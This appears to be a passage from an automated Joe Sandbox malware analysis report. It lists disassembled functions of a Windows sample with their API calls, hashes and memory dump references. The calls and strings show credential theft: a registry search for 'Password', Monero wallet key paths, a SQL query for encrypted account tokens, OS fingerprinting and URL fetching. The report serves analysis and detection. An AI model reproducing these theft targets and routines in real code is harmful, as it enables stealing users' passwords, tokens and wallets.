                    • API String ID: 2507841554-0
                    • Opcode ID: 9e2355ae8da4f64122124c99cf478e871f49535d38821542615df859795bdb77
                    • Instruction ID: ebd2513730d8512142ac2d012343cf0d1d921f63d5889dd3a9ee52dab3879dec
                    • Opcode Fuzzy Hash: 9e2355ae8da4f64122124c99cf478e871f49535d38821542615df859795bdb77
                    • Instruction Fuzzy Hash: 4D514EB1900218AFDB20DF51DC49FEEB7B8EB44701F1480E9A605BB181EB756A89CF95
                    Function 00BC72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BC733A
                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BC73B1
                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BC740D
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00BC7452
                    • HeapFree.KERNEL32(00000000), ref: 00BC7459
                    • task.LIBCPMTD ref: 00BC7555
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$EnumFreeOpenProcessValuetask
                    • String ID: Password
                    • API String ID: 775622407-3434357891
                    • Opcode ID: e3ae01cb5dd7b81aaee0d5274edc9c217f5a02f0d3eb48b4425c8cca1948a5e2
                    • Instruction ID: e78161b3de86328f67b1748675c9a26e79eb0987c72add4f49eb6ec94a63f72c
                    • Opcode Fuzzy Hash: e3ae01cb5dd7b81aaee0d5274edc9c217f5a02f0d3eb48b4425c8cca1948a5e2
                    • Instruction Fuzzy Hash: 646109B59442689BDB24DB50DC85FDAB7F8BF48300F0481E9E689A6241DF705BC9CFA1
                    Function 00BCBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                    • lstrlen.KERNEL32(00000000), ref: 00BCBC9F
                      • Part of subcall function 00BD8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BD8E52
                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 00BCBCCD
                    • lstrlen.KERNEL32(00000000), ref: 00BCBDA5
                    • lstrlen.KERNEL32(00000000), ref: 00BCBDB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                    • API String ID: 3073930149-1079375795
                    • Opcode ID: 61ceb6a47249847b1e9f425352d176fa08313ab6f558805c280d48f0cd788a65
                    • Instruction ID: 3267bfb3aeed00f246737439a1e45988e6e395aa9f1adb7fc8c272dfac97a42a
                    • Opcode Fuzzy Hash: 61ceb6a47249847b1e9f425352d176fa08313ab6f558805c280d48f0cd788a65
                    • Instruction Fuzzy Hash: 12B142719101089BDF04FBA0DC96EEEB3B8AF14300F4445AAF506B2291FF356E49CB66
                    Function 00BD6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess$DefaultLangUser
                    • String ID: *
                    • API String ID: 1494266314-163128923
                    • Opcode ID: 0ad4a5440f1ae83ac4a30d9ca47a3377a32bb3859bb685c061c9a6918856b3a8
                    • Instruction ID: 2922bc38a62bc565bd1e2a66725ed3b2cf6c853571a9b08597fed578f472ce87
                    • Opcode Fuzzy Hash: 0ad4a5440f1ae83ac4a30d9ca47a3377a32bb3859bb685c061c9a6918856b3a8
                    • Instruction Fuzzy Hash: 3AF0543090530DEFD3449FE1E90976CBB70FB04703F0C41AAE609A6291E6714F819B96
                    Function 00BC4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BC4FCA
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BC4FD1
                    • InternetOpenA.WININET(00BE0DDF,00000000,00000000,00000000,00000000), ref: 00BC4FEA
                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00BC5011
                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00BC5041
                    • InternetCloseHandle.WININET(?), ref: 00BC50B9
                    • InternetCloseHandle.WININET(?), ref: 00BC50C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                    • String ID:
                    • API String ID: 3066467675-0
                    • Opcode ID: 458aa145ef887b80c8d108ed247ecc2cb2a58ca3ab0cbae46e781783ca7e3d3f
                    • Instruction ID: d600425146791bea78488f74e62bea9540d21c261d4d7cc10984d563059d03f0
                    • Opcode Fuzzy Hash: 458aa145ef887b80c8d108ed247ecc2cb2a58ca3ab0cbae46e781783ca7e3d3f
                    • Instruction Fuzzy Hash: 6431F5B4A0021CABDB20CF54DC85BDDB7B4EB48704F5481E9EA09B7281DB716AC58F99
                    Function 00BD83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                    Download Yara Rule
                    APIs
                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BD8426
                    • wsprintfA.USER32 ref: 00BD8459
                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00BD847B
                    • RegCloseKey.ADVAPI32(00000000), ref: 00BD848C
                    • RegCloseKey.ADVAPI32(00000000), ref: 00BD8499
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                    • RegQueryValueExA.ADVAPI32(00000000,013CE218,00000000,000F003F,?,00000400), ref: 00BD84EC
                    • lstrlen.KERNEL32(?), ref: 00BD8501
                    • RegQueryValueExA.ADVAPI32(00000000,013CE230,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00BE0B34), ref: 00BD8599
                    • RegCloseKey.ADVAPI32(00000000), ref: 00BD8608
                    • RegCloseKey.ADVAPI32(00000000), ref: 00BD861A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                    • String ID: %s\%s
                    • API String ID: 3896182533-4073750446
                    • Opcode ID: 7fc1e13175b36279349746bbc6188239af94fa54e4e187fea554fec4b5490020
                    • Instruction ID: 4c145dbd5371b2faeb5fe48107a7a24eb2ccfae41a5c1e99d4dcea913c70ea6f
                    • Opcode Fuzzy Hash: 7fc1e13175b36279349746bbc6188239af94fa54e4e187fea554fec4b5490020
                    • Instruction Fuzzy Hash: 0021D67191021CAFDB24DB54DC85FE9B3B8FB48711F04C5E9A609A6240DF71AA85CFA4
                    Function 00BD7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BD76A4
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD76AB
                    • RegOpenKeyExA.ADVAPI32(80000002,013BC470,00000000,00020119,00000000), ref: 00BD76DD
                    • RegQueryValueExA.ADVAPI32(00000000,013CE200,00000000,00000000,?,000000FF), ref: 00BD76FE
                    • RegCloseKey.ADVAPI32(00000000), ref: 00BD7708
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID: Windows 11
                    • API String ID: 3225020163-2517555085
                    • Opcode ID: 44483e605043ded2b5dd2fea2d3981699a158b5e99f0984680a7619e6d99ae4d
                    • Instruction ID: fb89d920e97dac546b48e450918d8616ed82fc2113f4c95e452e3d364bdc1737
                    • Opcode Fuzzy Hash: 44483e605043ded2b5dd2fea2d3981699a158b5e99f0984680a7619e6d99ae4d
                    • Instruction Fuzzy Hash: 7301A7B5A40308BFD700DBE5DC4DFADB7B8EB04700F0484A5FA04E7290FA7199448B61
                    Function 00BD7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BD7734
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD773B
                    • RegOpenKeyExA.ADVAPI32(80000002,013BC470,00000000,00020119,00BD76B9), ref: 00BD775B
                    • RegQueryValueExA.ADVAPI32(00BD76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00BD777A
                    • RegCloseKey.ADVAPI32(00BD76B9), ref: 00BD7784
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID: CurrentBuildNumber
                    • API String ID: 3225020163-1022791448
                    • Opcode ID: cfbeb868ba9ec55e89fee9d614dda0286a56d9a00d8e632430b0930c1e699061
                    • Instruction ID: ad6b6da27c3867dcd51f292cf8bf259ed08c0ca6dbe21497a689de839acffff4
                    • Opcode Fuzzy Hash: cfbeb868ba9ec55e89fee9d614dda0286a56d9a00d8e632430b0930c1e699061
                    • Instruction Fuzzy Hash: EC01A7B5A4030CBFD700DBE1DC49FAEB7B8EB04700F0480A5FA04B7280EB7159448B61
                    Function 00BC99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BC99EC
                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BC9A11
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00BC9A31
                    • ReadFile.KERNEL32(000000FF,?,00000000,00BC148F,00000000), ref: 00BC9A5A
                    • LocalFree.KERNEL32(00BC148F), ref: 00BC9A90
                    • CloseHandle.KERNEL32(000000FF), ref: 00BC9A9A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                    • String ID:
                    • API String ID: 2311089104-0
                    • Opcode ID: d1136b61e05c5e59f383d3e5b612a01b2e395771af158b28821702b68f6e27fc
                    • Instruction ID: b401fa325ae96b5e23e0a8b95b4dc380217054e076a71e6598919e7765d2b021
                    • Opcode Fuzzy Hash: d1136b61e05c5e59f383d3e5b612a01b2e395771af158b28821702b68f6e27fc
                    • Instruction Fuzzy Hash: FA31D574A00209EFDB14CF95D989FAE77F5FF48340F108198E911A7290D775A985CFA1
                    Function 00BD4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrcat.KERNEL32(?,013CE500), ref: 00BD47DB
                      • Part of subcall function 00BD8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BD8E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD4801
                    • lstrcat.KERNEL32(?,?), ref: 00BD4820
                    • lstrcat.KERNEL32(?,?), ref: 00BD4834
                    • lstrcat.KERNEL32(?,013BBAB8), ref: 00BD4847
                    • lstrcat.KERNEL32(?,?), ref: 00BD485B
                    • lstrcat.KERNEL32(?,013CD640), ref: 00BD486F
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BD8D90: GetFileAttributesA.KERNEL32(00000000,?,00BC1B54,?,?,00BE564C,?,?,00BE0E1F), ref: 00BD8D9F
                      • Part of subcall function 00BD4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BD4580
                      • Part of subcall function 00BD4570: RtlAllocateHeap.NTDLL(00000000), ref: 00BD4587
                      • Part of subcall function 00BD4570: wsprintfA.USER32 ref: 00BD45A6
                      • Part of subcall function 00BD4570: FindFirstFileA.KERNEL32(?,?), ref: 00BD45BD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                    • String ID:
                    • API String ID: 2540262943-0
                    • Opcode ID: f667d7e7ffa1794718070c2ac4fb90a4349de2de0acda2f604a3368c88cbca83
                    • Instruction ID: c7fbf9bbb9f3bb9ec95bea1491f1d3e6762df1318b11c14cf9674367fc69f612
                    • Opcode Fuzzy Hash: f667d7e7ffa1794718070c2ac4fb90a4349de2de0acda2f604a3368c88cbca83
                    • Instruction Fuzzy Hash: 0B3182B690030C5BCB14FBA0DC86EEDB3BCAB58300F4455D9B359A6181EE75D6C98BA1
                    Function 00BD2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
